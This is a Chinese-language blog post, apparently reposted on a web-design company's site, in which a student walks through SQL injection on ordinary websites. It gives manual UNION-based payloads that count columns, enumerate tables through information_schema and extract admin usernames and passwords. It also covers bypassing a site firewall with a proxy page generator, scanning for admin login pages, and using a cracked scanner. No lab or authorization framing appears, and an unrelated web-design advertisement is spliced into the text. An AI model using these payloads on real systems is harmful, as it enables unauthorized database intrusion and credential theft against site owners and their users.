sql注入学习经验

本人是一名***新手,信息安全专业的学生一直在学习关于安全方面的理论学习,主要进行的是网站的搭建,但自从接触了web***之后才发现自己以前搭建的网站真是漏洞百出,从而也爱上了***的学习,今天就和大家分享一下我的学习成果,有什么不好的地方欢迎大家提意见!

大兴安岭网站建设公司创新互联公司,大兴安岭网站设计制作,有大型网站制作公司丰富经验。已为大兴安岭上千余家提供企业网站建设服务。企业网站搭建\外贸营销网站建设要多少钱,请找那个售后服务好的大兴安岭做网站的公司定做!

   今天主要是讲一讲sql注入,sql注入的原理和危害就不多说了,大家百度一下就可以了,给大家讲一讲我的实践经验。

   sql注入的方法(get参数)

   说复杂了没用其实就两种,工具注入与手工注入

   (一)选择网站是否能进行sql注入(一般使用火狐浏览器比较好——方便)

    (1)先查看URL页面为http://xxx.com/xxx/id=23 这样的页面或者为伪静态的url也可进行注入。       ·

    (2)在url后输入 

         and 1=1返回页面正常

         and 1=2返回页面错误

        

         or 1=1返回页面错误

         or 1=2返回页面正常

         这样的网站就有注入漏洞

现在的网站基本都有网站防火墙(带有防sql注入功能)这时可用‘工具注入中转生成器’来重新生成一个页面(注意打开这个页面要用iis或小旋风),这样就可以绕过网站安全狗了。

然后在新生成页面进行操作。

         and 1=1返回页面正常

         and 1=2返回页面错误

        

         or 1=1返回页面错误

         or 1=2返回页面正常

这样就可以进行下一步了。

   (一)个人经验一般应先进行目录的扫描,为什么呢?

    因为先应该找到网站后台的登录界面,如果连登陆界面都无法找到,就算知道了管理员的用户 名密码又有什么用呢。

    可以手工查找,就是猜名称,一般为admin|login|user等asp、php、aspx、jsp后缀的,这种方 法有点傻,一般用工具进行网站遍历。

    扫描工具:工具在附件里都有。我一般先使用御剑的扫描工具,但御剑的岁数毕竟不小了,也 没有后续的更新,所以有些网站目录是无法遍历出来的,这是只能用一些牛逼的工具了。工具burpsuite(都说是***神器,我也一直在用,功能挺强大的,可以进行网站爬行与网站目录的遍历)还有就是Acunetix Web Vulnerability Scanner这款软件也是非常强大的,现在出到10了,网上破解版。具体使用教程请自行百度。

   (二)进行注入

         可用工具啊D、明小子、pangolin穿山甲、sqlmap等工具进行注入,今天主要讲解手工注入。

         手工注入:

      1、order by 1.....100判断表数

         若页面返回正常则说明这个数字小于表数,依次递加,最好取中进行测试节省时间,最后一个           正确的为表数,如20正常,21不正常,则表数为20

      2、   http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT                                    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

         显示3,7数字

      3、   将3或7替换为database()、version()、user()、@@version——compile_os

            报基本信息  (1)database():数据库名-------abc

                (2)version():数据库版本--------5.1.63-community

                (3)user():数据库用户----------shsjk@localhost

                 (4)@@version——compile_os:操作系统--------win32

      4、表名查询   http://xxx/xxx.php?id=23 and 1=2 UNION SELECT                            1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20from                information_schema.tables where table_schema=0x616263(此处为数据库名,可用小葵          转换工具转换为Hex值)

         查询结果为:wz_jj_admin,wz_jj_article,wz_jj_p_w_upload,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_p_w_upload,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message 

      5、分析表wz_jj_admin 查找表的列名

         http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT                            1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E

        结果为:uid , ad_username,ad_password,ad_power,ad_intro

      6、查找用户名,密码http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(ad_username,0x5c,ad_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from wz_jj_admin

      7、结果为:admin  admin888 这样就成功了

这只是简单的sql注入,后续的参数注入有post注入、cookie注入,请耐心等待!


本文名称:sql注入学习经验
本文URL:http://pwwzsj.com/article/pcejos.html